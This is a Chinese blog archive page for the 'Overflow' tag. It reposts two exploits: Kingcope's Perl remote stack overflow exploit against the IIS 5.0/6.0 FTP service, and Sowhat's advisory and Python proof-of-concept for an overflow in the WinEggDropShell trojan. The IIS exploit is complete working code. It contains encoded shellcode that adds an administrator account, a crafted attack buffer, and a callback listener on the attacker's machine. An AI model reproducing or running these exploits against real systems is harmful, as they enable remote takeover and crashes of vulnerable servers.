存档

文章标签 ‘Overflow’

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

2009年9月1日 没有评论 57 views

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" .
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" .
"\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" .
"\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" .
"\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" .
"\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" .
"\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" .
"\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" .
"\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" .
"\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" .
"\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" .
"\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" .
"\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" .
"\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" .
"\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" .
"\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" .
"\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" .
"\x51\x54\x43\x30\x41\x41";
#1ca
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n";
if ($#ARGV ne 1) {
print "usage: iiz5.pl \n";
exit(0);
}
srand(time());
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
$locip =~ s/\./,/gi;
if (fork()) {
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '21',
Proto => 'tcp');
$patch = "\x7E\xF1\xFA\x7F";
#$retaddr = "ZZZZ";
$retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
$findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53"
."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0";
# attack buffer
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
"HHHHIIII".
$patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN";
$x = < $sock>;
print $x;
print $sock "USER anonymous\r\n";
$x = < $sock>;
print $x;
print $sock "PASS anonymous\r\n";
$x = < $sock>;
print $x;
print $sock "MKD w00t$port\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack)
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "SITE $v\r\n";
$x = < $sock>;
print $x;
print $sock "CWD w00t$port\r\n";
$x = < $sock>;
print $x;
print $sock "MKD CCC". "$c\r\n";
$x = < $sock>;
print $x;
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n";
$x = < $sock>;
print $x;
# TRIGGER
print $sock "NLST $c*/../C*/\r\n";
$x = < $sock>;
print $x;
while (1) {}
} else {
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $!\n" unless $servsock;
my $new_sock = $servsock->accept();
while(< $new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope

# milw0rm.com [2009-08-31]

分类: 矩阵毒刺 标签: , ,

WinEggDropShell Multiple Remote Stack Overflow

2009年5月19日 没有评论 75 views

WinEggDropShell Multiple Remote Stack Overflow

by Sowhat
Last Update: 2005.12.09

http://secway.org/advisory/AD20051202.txt
http://secway.org/exploit/wineggdropshell_bof.py.txt

Affected:

WinEggDropShell Eterntiy version (1.7)
Other version may be vulnerable toooooo

CVE: CVE-2005-3992
BID: 15682 

Overview:

WinEggDropShell is a popular Chinese RAT (remote access trojan).
WineggDropShell provide HTTP Proxy/Socks Proxy/HTTP Server/FTP Server.
for more information, Goooooooooooooogle...

Multiple preauth stack overflow found in the HTTP/FTP server can be used to 
execute arbitrary command or D0S (blue screen, yes, it's cool ;)

Vulnerability:

1. FTP USER bof

.text:100027BD                 push    offset aUser    ; "USER"
.text:100027C2                 call    _strlen
.text:100027C7                 add     esp, 4
.text:100027CA                 lea     edi, [ebp+eax-103h]
.text:100027D1                 push    edi
.text:100027D2                 push    offset aS       ; "%s"
.text:100027D7                 lea     edi, [ebp+var_208]
.text:100027DD                 push    edi             ; char *
.text:100027DE                 call    _sprintf        ; emmmmm, ;)

_ReceiveSocketBuffer can maximum recv 0x200h, but [ebp+var_208] is 
a 0x104h buffer. 

2. FTP Server Pass Command
   .............

3. HTTP GET stack overflow!
   GET /A*260

PoC:
http://secway.org/exploit/wineggdropshell_bof.py.txt

Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)

Reference:
[1] https://www.openrce.org/articles/full_view/18
[2] http://www.ccc.de/congress/2005/
[3] http://secway.org

#!/usr/bin/python
# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
# HTTP Server "GET"  && FTP Server "USER" "PASS" command
# Bug Discoverd and coded by Sowhat
# Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
# http://secway.org
# 2005-10-11

# Affected:
# WinEggDropShell Eterntiy version
# Other version may be vulnerable toooooo

import sys
import string
import socket

if (len(sys.argv) != 4):
  
  print "##########################################################################"
  print "#      WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC         #"
  print "#          This Poc will BOD the vulnerable target                       #"
  print "#          Bug Discoverd and coded  by Sowhat                            #"
  print "#                 http://secway.org                                      #"
  print "##########################################################################"
  print "\nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Port\n"
  print "Example: \n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80" 
  print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21" 
  sys.exit(0)

host = sys.argv[2]
port = string.atoi(sys.argv[3])

if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")):

    request = "USER " + 'A'*512 + "\r"

if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")):

    request = "GET /" + 'A'*512 + " HTTP/1.1 \r\n" 

exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.connect((host,port))
exp.send(request)

---EOF-----

分类: 技术文章 标签: ,